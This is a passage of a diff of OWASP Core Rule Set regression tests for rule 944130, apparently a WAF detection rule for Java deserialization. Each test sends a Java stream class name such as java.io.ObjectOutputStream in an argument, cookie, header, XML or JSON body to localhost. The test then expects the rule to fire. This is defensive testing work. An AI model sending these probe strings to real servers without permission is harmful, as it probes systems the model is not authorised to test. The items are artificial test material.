"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 180 desc: "Cookie name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ObjectOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + 
data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 181 desc: "Request header test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 182 desc: "XML attribute value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 183 desc: "XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 184 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-185 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 185 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 186 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ObjectOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 187 desc: "Content-Type application/json arg name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ObjectOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 188 desc: "Argument test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 189 desc: "Argument name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 190 desc: "Cookie test includes keyword 
java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 191 desc: "Cookie name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.OutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 192 desc: "Request header test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 193 desc: "XML attribute value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 194 desc: "XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 195 desc: "Nested XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-196 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 196 desc: "Content-Type text/plain includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 197 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "{\"test\": \"java.io.OutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 198 desc: "Content-Type application/json arg name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.OutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 199 desc: "Argument test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 200 desc: "Argument name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 201 desc: 
"Cookie test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 202 desc: "Cookie name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 203 desc: "Request header test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 204 desc: "XML attribute value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-205 + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 205 desc: "XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 206 desc: "Nested XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
